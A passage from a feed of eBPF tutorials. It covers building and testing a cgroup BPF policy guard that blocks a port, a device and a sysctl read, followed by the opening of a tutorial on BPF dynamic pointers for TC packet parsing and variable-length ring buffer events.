&lt;p&gt;Next comes the standard skeleton workflow: &lt;code&gt;cgroup_guard_bpf__open()&lt;/code&gt; opens the BPF object, the loader fills in the &lt;code&gt;.rodata&lt;/code&gt; configuration, and &lt;code&gt;cgroup_guard_bpf__load()&lt;/code&gt; loads everything into the kernel. The configuration must be written before the load step: once loaded, the &lt;code&gt;.rodata&lt;/code&gt; map is frozen and userspace can no longer change it.&lt;/p&gt;

&lt;p&gt;Attaching uses &lt;code&gt;bpf_program__attach_cgroup(prog, cg_fd)&lt;/code&gt; to attach each BPF program to the cgroup. Here we attach three programs: connect4, dev, and sysctl. After successful attachment, all processes in this cgroup will have their relevant operations go through these BPF programs.&lt;/p&gt;

&lt;p&gt;Finally, the event loop. &lt;code&gt;ring_buffer__poll()&lt;/code&gt; polls the ringbuf and calls the &lt;code&gt;handle_event&lt;/code&gt; callback whenever events arrive to print them. This lets you see which operations are being denied in real time.&lt;/p&gt;

&lt;h2&gt;
  
  
  Building
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;src/cgroup
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
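
&lt;p&gt;Because the loader attaches to a cgroup v2 directory, it can be worth confirming that the target path really sits on a cgroup v2 mount before running it. The following is a minimal sketch and not part of the tutorial repository: the &lt;code&gt;is_cgroup2&lt;/code&gt; function name is made up for illustration, and it assumes GNU &lt;code&gt;stat&lt;/code&gt;, which reports the filesystem type of a cgroup v2 mount as &lt;code&gt;cgroup2fs&lt;/code&gt;.&lt;/p&gt;

```shell
#!/bin/sh
# Hypothetical helper: succeed only if the given path is on a cgroup v2 mount.
# Assumes GNU stat; "-f -c %T" prints the filesystem type in human-readable form.
is_cgroup2() {
    fstype=$(stat -f -c '%T' "$1" 2>/dev/null)
    [ "$fstype" = "cgroup2fs" ]
}

if is_cgroup2 /sys/fs/cgroup; then
    echo "cgroup v2 detected"
else
    echo "no cgroup v2 mount at /sys/fs/cgroup"
fi
```

&lt;p&gt;On hosts that still use cgroup v1, &lt;code&gt;/sys/fs/cgroup&lt;/code&gt; is typically a &lt;code&gt;tmpfs&lt;/code&gt; mount, so the check fails and the loader would have nothing suitable to attach to.&lt;/p&gt;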



&lt;h2&gt;
  
  
  Running
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Terminal A: Start the loader
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Block: TCP port 9090, /dev/null (1:3), reading kernel/hostname&lt;/span&gt;
&lt;span class="nb"&gt;sudo&lt;/span&gt; ./cgroup_guard &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--cgroup&lt;/span&gt; /sys/fs/cgroup/ebpf_demo &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--block-port&lt;/span&gt; 9090 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--deny-device&lt;/span&gt; 1:3 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--deny-sysctl&lt;/span&gt; kernel/hostname
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You should see:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Attached to cgroup: /sys/fs/cgroup/ebpf_demo
Config: block_port=9090, deny_device=1:3, deny_sysctl_read=kernel/hostname
Press Ctrl-C to stop.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
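
&lt;p&gt;The &lt;code&gt;--deny-device&lt;/code&gt; option is given a &lt;code&gt;major:minor&lt;/code&gt; pair such as &lt;code&gt;1:3&lt;/code&gt;. To look up the pair for a different device node, a small shell sketch like the one below may help. It assumes GNU &lt;code&gt;stat&lt;/code&gt;, whose &lt;code&gt;%t&lt;/code&gt; and &lt;code&gt;%T&lt;/code&gt; formats print the major and minor numbers in hexadecimal; the &lt;code&gt;dev_numbers&lt;/code&gt; function name is hypothetical.&lt;/p&gt;

```shell
#!/bin/sh
# Hypothetical helper: print a device node's numbers as decimal major:minor.
# GNU stat prints them in hex via %t (major) and %T (minor), so printf converts them.
dev_numbers() {
    major_hex=$(stat -c '%t' "$1")
    minor_hex=$(stat -c '%T' "$1")
    printf '%d:%d\n' "0x$major_hex" "0x$minor_hex"
}

dev_numbers /dev/null
```

&lt;p&gt;On Linux, &lt;code&gt;/dev/null&lt;/code&gt; is character device 1:3, which matches the value passed to the loader above.&lt;/p&gt;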



&lt;h3&gt;
  
  
  Terminal B: Start test servers (outside cgroup)
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Start two HTTP servers&lt;/span&gt;
python3 &lt;span class="nt"&gt;-m&lt;/span&gt; http.server 8080 &lt;span class="nt"&gt;--bind&lt;/span&gt; 127.0.0.1 &amp;amp;
python3 &lt;span class="nt"&gt;-m&lt;/span&gt; http.server 9090 &lt;span class="nt"&gt;--bind&lt;/span&gt; 127.0.0.1 &amp;amp;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Terminal C: Test from within the cgroup
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;bash &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s1"&gt;'
echo $$ &amp;gt; /sys/fs/cgroup/ebpf_demo/cgroup.procs

echo "== TCP test =="
curl -s http://127.0.0.1:8080 &amp;gt;/dev/null &amp;amp;&amp;amp; echo "8080 OK"
curl -s http://127.0.0.1:9090 &amp;gt;/dev/null &amp;amp;&amp;amp; echo "9090 OK (unexpected)" || echo "9090 BLOCKED (expected)"

echo
echo "== Device test =="
cat /dev/null &amp;amp;&amp;amp; echo "/dev/null OK (unexpected)" || echo "/dev/null BLOCKED (expected)"

echo
echo "== Sysctl test =="
cat /proc/sys/kernel/hostname &amp;amp;&amp;amp; echo "sysctl read OK (unexpected)" || echo "sysctl read BLOCKED (expected)"
'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Expected output:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;8080 OK&lt;/code&gt; - Port 8080 is allowed&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;9090 BLOCKED (expected)&lt;/code&gt; - Port 9090 is blocked&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/dev/null BLOCKED (expected)&lt;/code&gt; - Device 1:3 is blocked&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;sysctl read BLOCKED (expected)&lt;/code&gt; - Reading kernel/hostname is blocked&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Terminal A output (events)
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[DENY connect4] pid=12345 comm=curl daddr=127.0.0.1 dport=9090 proto=6
[DENY device]   pid=12346 comm=cat major=1 minor=3 access_type=0x...
[DENY sysctl]   pid=12347 comm=cat write=0 name=kernel/hostname
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  One-click Test
&lt;/h2&gt;

&lt;p&gt;We provide a test script that automatically compiles, starts servers, runs tests, and cleans up:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./test.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Verifying with bpftool
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;bpftool cgroup tree /sys/fs/cgroup/ebpf_demo
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  When to Use cgroup eBPF
&lt;/h2&gt;

&lt;p&gt;Choosing the right technology depends on your control granularity requirements.&lt;/p&gt;

&lt;p&gt;cgroup eBPF's control granularity is &lt;strong&gt;process groups&lt;/strong&gt;—put processes in a cgroup, attach a BPF program, and the policy applies to that group. This is perfect for container scenarios: each container is a cgroup, and you can set different network policies, device permissions, and sysctl access rules for different containers. When a process leaves the cgroup, the policy automatically stops applying—no manual cleanup needed.&lt;/p&gt;

&lt;p&gt;XDP and tc's control granularity is &lt;strong&gt;network interfaces&lt;/strong&gt;. They handle all traffic passing through a specific NIC, regardless of which process it comes from. If you need high-performance packet processing, DDoS protection, or load balancing, XDP/tc are better choices. But if you want "only allow container A to access port 80, while container B can access any port," XDP/tc become inconvenient.&lt;/p&gt;

&lt;p&gt;seccomp-BPF's control granularity is &lt;strong&gt;individual processes&lt;/strong&gt;. It filters system calls, such as preventing a process from calling &lt;code&gt;fork&lt;/code&gt;, &lt;code&gt;exec&lt;/code&gt;, or &lt;code&gt;socket&lt;/code&gt;. seccomp is lower-level and well suited to process sandboxing. However, its filters see only raw syscall numbers and argument values and cannot dereference pointers, so they cannot express higher-level semantics such as network destination addresses or device major:minor numbers.&lt;/p&gt;

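&lt;p&gt;Traditional iptables/nftables rules are effectively &lt;strong&gt;global&lt;/strong&gt; within a network namespace. By default, the rules you configure apply to every process in that namespace. Saying "this rule only affects container A" requires extra match extensions or a separate namespace per container, and even then the rules cover only network traffic, not devices or sysctls.&lt;/p&gt;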

&lt;p&gt;In summary: if you need per-container/process-group policies, want to control network, devices, and sysctls together, and want policies to automatically follow process lifecycles, cgroup eBPF is the right choice.&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;By binding policies to process groups, cgroup eBPF provides fine-grained control that traditional global policies can't achieve. This tutorial demonstrated three commonly used cgroup hooks:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cgroup/connect4&lt;/code&gt;&lt;/strong&gt;: Filter destination ports at TCP connection time, blocking disallowed outbound connections&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cgroup/dev&lt;/code&gt;&lt;/strong&gt;: Check major:minor at device access time, restricting reads/writes to specific devices&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cgroup/sysctl&lt;/code&gt;&lt;/strong&gt;: Check names at sysctl read/write time, preventing sensitive configuration leaks or tampering&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This "policy guard" pattern can be extended to production use cases: container network policies (similar to Kubernetes NetworkPolicy), device isolation (GPU/TPU exclusive access), security sandboxes (restricting system information access). With ringbuf event reporting, you can also implement policy auditing and alerting.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you want to learn more about eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Kernel docs:&lt;/strong&gt; &lt;a href="https://docs.kernel.org/bpf/libbpf/program_types.html" rel="noopener noreferrer"&gt;libbpf program types&lt;/a&gt; - all cgroup-related section names&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;eBPF docs:&lt;/strong&gt; &lt;a href="https://docs.ebpf.io/linux/program-type/BPF_PROG_TYPE_CGROUP_SOCK_ADDR/" rel="noopener noreferrer"&gt;CGROUP_SOCK_ADDR&lt;/a&gt; - socket address hooks explained&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;eBPF docs:&lt;/strong&gt; &lt;a href="https://docs.ebpf.io/linux/program-type/BPF_PROG_TYPE_CGROUP_DEVICE/" rel="noopener noreferrer"&gt;CGROUP_DEVICE&lt;/a&gt; - device access control explained&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;eBPF docs:&lt;/strong&gt; &lt;a href="https://docs.ebpf.io/linux/program-type/BPF_PROG_TYPE_CGROUP_SYSCTL/" rel="noopener noreferrer"&gt;CGROUP_SYSCTL&lt;/a&gt; - sysctl access control explained&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tutorial repository:&lt;/strong&gt; &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/cgroup" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/cgroup&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

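&lt;p&gt;Full source code is available in the tutorial repository. Requires cgroup v2, libbpf, and in practice Linux 5.8 or later: cgroup BPF attachment dates back to kernel 4.10, but the &lt;code&gt;cgroup/sysctl&lt;/code&gt; hook arrived in 5.2 and the BPF ring buffer used for event reporting in 5.8.&lt;/p&gt;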

</description>
      <category>ebpf</category>
      <category>cgroup</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>eBPF Tutorial by Example: BPF Dynamic Pointers for Variable-Length Data</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 17 Feb 2026 07:43:38 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-by-example-bpf-dynamic-pointers-for-variable-length-data-cj2</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-by-example-bpf-dynamic-pointers-for-variable-length-data-cj2</guid>
      <description>&lt;p&gt;Ever written an eBPF packet parser and struggled with those verbose &lt;code&gt;data_end&lt;/code&gt; bounds checks that the verifier still rejects? Or tried to send variable-length events through ring buffers only to find yourself locked into fixed-size structures? Traditional eBPF development forces you to prove memory safety statically, when the verifier checks the program at load time, which becomes painful when dealing with runtime-determined sizes like packet lengths or user-configurable snapshot lengths.&lt;/p&gt;

&lt;p&gt;This is what &lt;strong&gt;BPF dynptrs&lt;/strong&gt; (dynamic pointers) solve. Introduced gradually from Linux v5.19, dynptrs provide a verifier-friendly way to work with variable-length data by shifting some bounds checking from load-time static analysis to runtime validation. In this tutorial, we'll build a TC ingress program that uses &lt;strong&gt;skb dynptrs&lt;/strong&gt; to parse TCP packets safely and &lt;strong&gt;ringbuf dynptrs&lt;/strong&gt; to output variable-length events containing configurable payload snapshots.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/dynptr" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/dynptr&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction to BPF Dynamic Pointers
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: When Static Verification Isn't Enough
&lt;/h3&gt;

&lt;p&gt;The eBPF verifier's core mission is proving memory safety at load time. Every pointer dereference must be bounded, every array access must be within limits. This works beautifully for simple cases, but becomes a struggle when sizes are determined at runtime.&lt;/p&gt;

&lt;p&gt;Consider parsing a packet where the IP header length comes from a 4-bit field, or reading user-configurable amounts of TCP payload. The classic approach requires extensive bounds checking with &lt;code&gt;data_end&lt;/code&gt; comparisons, and even correctly written code sometimes fails verification because the verifier cannot trace all possible paths. When working with non-linear skb data (paged buffers), the situation gets worse since that data isn't directly accessible through &lt;code&gt;ctx-&amp;gt;data&lt;/code&gt; at all.&lt;/p&gt;

&lt;p&gt;Variable-length output presents similar challenges. The traditional &lt;code&gt;bpf_ringbuf_reserve()&lt;/code&gt; takes a size that must be known at verification time and returns a raw pointer, so writing a runtime-determined amount of data through it is rejected unless the verifier can statically prove that every write stays within bounds.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Solution: Runtime-Checked Dynamic Pointers
&lt;/h3&gt;

&lt;p&gt;Dynptrs introduce an opaque handle type that carries metadata about the underlying memory region including its bounds and type. You cannot dereference a dynptr directly since the verifier will reject such attempts. Instead, you must use helper functions or kfuncs that perform the appropriate safety checks.&lt;/p&gt;

&lt;p&gt;The key insight is that &lt;strong&gt;some of these checks happen at runtime rather than at load time&lt;/strong&gt;. Functions like &lt;code&gt;bpf_dynptr_read()&lt;/code&gt; and &lt;code&gt;bpf_dynptr_write()&lt;/code&gt; validate bounds when they execute and return errors on failure. Functions like &lt;code&gt;bpf_dynptr_slice()&lt;/code&gt; return NULL when the requested region cannot be accessed safely. This lets you express logic that would be unprovable statically while maintaining safety guarantees.&lt;/p&gt;

&lt;p&gt;For the verifier, dynptrs are tracked specially. They have lifecycle rules (some must be released), type constraints (skb dynptrs behave differently than local dynptrs), and the verifier ensures you follow these rules. The runtime checks are the verifier's way of delegating what it cannot prove statically.&lt;/p&gt;

&lt;h2&gt;
  
  
  Dynptr API Overview
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Helpers vs Kfuncs
&lt;/h3&gt;

&lt;p&gt;The dynptr ecosystem spans two categories of functions. &lt;strong&gt;Helper functions&lt;/strong&gt; are part of the stable UAPI and generally maintain backward compatibility. &lt;strong&gt;Kfuncs&lt;/strong&gt; (kernel functions) are internal kernel exports to BPF with no ABI stability guarantees, meaning they may change between kernel versions.&lt;/p&gt;

&lt;p&gt;For dynptrs, the foundational read/write operations are helpers, while newer features like skb dynptrs and slicing are kfuncs. This means some dynptr functionality requires newer kernels and you should verify availability before relying on specific features.&lt;/p&gt;
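
&lt;p&gt;One rough way to verify availability from the shell is to look for the kfunc's symbol in &lt;code&gt;/proc/kallsyms&lt;/code&gt;. This is only a heuristic sketch: the &lt;code&gt;has_ksym&lt;/code&gt; function is a made-up name, and a symbol being present does not guarantee that a given program type is allowed to call it.&lt;/p&gt;

```shell
#!/bin/sh
# Hypothetical helper: succeed if a kernel symbol name appears in a kallsyms-style file.
# The second argument defaults to /proc/kallsyms; -w avoids matching longer names
# that merely start with the requested one.
has_ksym() {
    grep -qw -- "$1" "${2:-/proc/kallsyms}" 2>/dev/null
}

for sym in bpf_dynptr_from_skb bpf_dynptr_slice; do
    if has_ksym "$sym"; then
        echo "$sym: available"
    else
        echo "$sym: not found"
    fi
done
```

&lt;p&gt;A "not found" result on an older kernel is a hint to fall back to the helper-based dynptr operations or to classic &lt;code&gt;data_end&lt;/code&gt; bounds checks.&lt;/p&gt;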

&lt;h3&gt;
  
  
  Creating Dynptrs
&lt;/h3&gt;

&lt;p&gt;There are several ways to create dynptrs depending on your data source. The &lt;code&gt;bpf_dynptr_from_mem()&lt;/code&gt; helper creates a dynptr from map values or global variables, useful for working with configuration data or scratch buffers. The &lt;code&gt;bpf_dynptr_from_skb()&lt;/code&gt; kfunc creates a dynptr from a socket buffer, enabling safe access to packet data including non-linear (paged) regions. For XDP programs, &lt;code&gt;bpf_dynptr_from_xdp()&lt;/code&gt; provides similar functionality.&lt;/p&gt;

&lt;p&gt;Ring buffer operations use &lt;code&gt;bpf_ringbuf_reserve_dynptr()&lt;/code&gt; to allocate variable-length records. Unlike regular &lt;code&gt;bpf_ringbuf_reserve()&lt;/code&gt;, which returns a pointer to a fixed-size region, the dynptr variant lets you specify the size at runtime. This is crucial for variable-length event structures.&lt;/p&gt;

&lt;h3&gt;
  
  
  Reading and Writing
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;bpf_dynptr_read()&lt;/code&gt; helper copies data from a dynptr into a destination buffer. It takes an offset and length, performing runtime bounds checking and returning an error if the read would exceed the dynptr's bounds. This is the safe way to extract data when you need it in a local buffer.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;bpf_dynptr_write()&lt;/code&gt; helper does the reverse, copying data into a dynptr. For skb dynptrs, writing may have additional semantics similar to &lt;code&gt;bpf_skb_store_bytes()&lt;/code&gt;, and note that writes can invalidate previously obtained slices.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;bpf_dynptr_data()&lt;/code&gt; helper returns a direct pointer to data within the dynptr, with the verifier tracking the bounds statically. However, this does NOT work for skb or xdp dynptrs since their data may not be in a single contiguous region.&lt;/p&gt;

&lt;h3&gt;
  
  
  Slicing for Packet Parsing
&lt;/h3&gt;

&lt;p&gt;For skb and xdp dynptrs, &lt;code&gt;bpf_dynptr_slice()&lt;/code&gt; is the primary way to access data. You provide an offset, a length, and optionally a local buffer. The function returns a pointer to the requested data, which may be either a direct pointer into the packet or your provided buffer (if the data needed to be copied from non-linear regions).&lt;/p&gt;

&lt;p&gt;The critical rule is that &lt;strong&gt;you must NULL-check the return value&lt;/strong&gt;. A NULL return means the requested region cannot be accessed, either because it exceeds packet bounds or for other internal reasons. Once you have a valid slice pointer, you can dereference it safely within the requested bounds.&lt;/p&gt;

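&lt;p&gt;There's also &lt;code&gt;bpf_dynptr_slice_rdwr()&lt;/code&gt; for obtaining writable slices, with availability depending on the program type and whether the underlying data supports writes. If the returned pointer is your own buffer rather than a pointer into the packet, your changes live in a copy and must be committed back with &lt;code&gt;bpf_dynptr_write()&lt;/code&gt;.&lt;/p&gt;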
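
&lt;p&gt;A writable slice might be used as in the sketch below, which overwrites the destination MAC address on TC ingress. The program name and the replacement address are hypothetical, the kfunc declarations mirror the style this tutorial uses and may need adjusting to your kernel's BTF, and &lt;code&gt;TC_ACT_OK&lt;/code&gt; is defined locally because &lt;code&gt;vmlinux.h&lt;/code&gt; carries no macros.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;// SPDX-License-Identifier: GPL-2.0
#include &amp;lt;vmlinux.h&amp;gt;
#include &amp;lt;bpf/bpf_helpers.h&amp;gt;

#ifndef TC_ACT_OK
#define TC_ACT_OK 0 /* value from the kernel's pkt_cls.h UAPI header */
#endif

extern int bpf_dynptr_from_skb(struct __sk_buff *s, __u64 flags,
                               struct bpf_dynptr *ptr__uninit) __ksym;
extern void *bpf_dynptr_slice_rdwr(const struct bpf_dynptr *ptr, __u32 offset,
                                   void *buffer__opt, __u32 buffer__sz) __ksym;

SEC("tc")
int rewrite_dst_mac(struct __sk_buff *ctx)
{
    /* Hypothetical replacement address, for illustration only. */
    __u8 new_dst[6] = {0x02, 0x00, 0x00, 0x00, 0x00, 0x01};
    struct bpf_dynptr skb_ptr;
    struct ethhdr eth_buf;
    struct ethhdr *eth;

    if (bpf_dynptr_from_skb(ctx, 0, &amp;amp;skb_ptr))
        return TC_ACT_OK;

    /* Writable slice: either a pointer into the packet or a copy in eth_buf. */
    eth = bpf_dynptr_slice_rdwr(&amp;amp;skb_ptr, 0, &amp;amp;eth_buf, sizeof(eth_buf));
    if (!eth)
        return TC_ACT_OK;

    __builtin_memcpy(eth-&amp;gt;h_dest, new_dst, sizeof(new_dst));

    /* If we were handed our own buffer, the edit landed in a copy:
     * commit it to the packet. The slice is not used after this write. */
    if (eth == &amp;amp;eth_buf)
        bpf_dynptr_write(&amp;amp;skb_ptr, 0, &amp;amp;eth_buf, sizeof(eth_buf), 0);

    return TC_ACT_OK;
}

char _license[] SEC("license") = "GPL";
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Because a write to an skb dynptr invalidates existing slices, the sketch performs the write-back last and does not touch &lt;code&gt;eth&lt;/code&gt; afterwards.&lt;/p&gt;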

&lt;h3&gt;
  
  
  Ring Buffer Lifecycle
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;bpf_ringbuf_reserve_dynptr()&lt;/code&gt; function has special lifecycle rules enforced by the verifier. Once you call it, you &lt;strong&gt;must&lt;/strong&gt; call either &lt;code&gt;bpf_ringbuf_submit_dynptr()&lt;/code&gt; or &lt;code&gt;bpf_ringbuf_discard_dynptr()&lt;/code&gt; on the dynptr, regardless of whether the reservation succeeded. This is not optional since the verifier tracks dynptr state and will reject programs that leak reserved dynptrs.&lt;/p&gt;

&lt;p&gt;This differs from regular ringbuf usage, where a NULL return from &lt;code&gt;bpf_ringbuf_reserve()&lt;/code&gt; means nothing was allocated and there is nothing to release. With dynptrs, a failed reservation still leaves the verifier expecting a release, so you call discard anyway; at runtime, discarding the resulting null dynptr is a no-op. The verifier needs this guarantee to ensure proper resource management on every path.&lt;/p&gt;
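
&lt;p&gt;The lifecycle rule can be sketched with a fixed-size record that is filled through a direct pointer. The &lt;code&gt;sample&lt;/code&gt; struct, the &lt;code&gt;rb&lt;/code&gt; map, the program name, and the tracepoint are assumptions made for this example. Note that the reserve result is not used for control flow here: a failed reservation leaves a null dynptr, &lt;code&gt;bpf_dynptr_data()&lt;/code&gt; then returns NULL, and that path discards.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;// SPDX-License-Identifier: GPL-2.0
#include &amp;lt;vmlinux.h&amp;gt;
#include &amp;lt;bpf/bpf_helpers.h&amp;gt;

/* Hypothetical fixed-size record, used only for this illustration. */
struct sample {
    __u64 ts_ns;
    __u32 pid;
};

struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 1 &amp;lt;&amp;lt; 16);
} rb SEC(".maps");

SEC("tp/syscalls/sys_enter_nanosleep")
int ringbuf_lifecycle(void *ctx)
{
    struct bpf_dynptr ptr;
    struct sample *s;

    /* Whether or not this succeeds, ptr must be submitted or discarded below. */
    bpf_ringbuf_reserve_dynptr(&amp;amp;rb, sizeof(*s), 0, &amp;amp;ptr);

    /* On a failed reservation the dynptr is null and this returns NULL. */
    s = bpf_dynptr_data(&amp;amp;ptr, 0, sizeof(*s));
    if (!s) {
        bpf_ringbuf_discard_dynptr(&amp;amp;ptr, 0);
        return 0;
    }

    s-&amp;gt;ts_ns = bpf_ktime_get_ns();
    s-&amp;gt;pid = bpf_get_current_pid_tgid() &amp;gt;&amp;gt; 32;

    bpf_ringbuf_submit_dynptr(&amp;amp;ptr, 0);
    return 0;
}

char _license[] SEC("license") = "GPL";
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Every exit after the reserve call passes through exactly one of submit or discard, which is the property the verifier checks.&lt;/p&gt;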

&lt;h2&gt;
  
  
  Implementation: TC Ingress with Dynptr Parsing and Variable-Length Events
&lt;/h2&gt;

&lt;p&gt;Our demonstration program attaches to TC ingress and accomplishes three things. First, it creates an skb dynptr from incoming packets using &lt;code&gt;bpf_dynptr_from_skb()&lt;/code&gt;. Second, it parses Ethernet, IPv4, and TCP headers using &lt;code&gt;bpf_dynptr_slice()&lt;/code&gt; for safe bounds-checked access. Third, it outputs variable-length events through a ringbuf dynptr, including a configurable snapshot of TCP payload.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete BPF Program: dynptr_tc.bpf.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;vmlinux.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_endian.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"dynptr_tc.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cm"&gt;/* kfunc declarations for dynptr operations (v6.4+) */&lt;/span&gt;
&lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;bpf_dynptr_from_skb&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;__sk_buff&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;__u64&lt;/span&gt; &lt;span class="n"&gt;flags&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                               &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_dynptr&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ptr__uninit&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;__ksym&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;bpf_dynptr_slice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_dynptr&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;offset&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
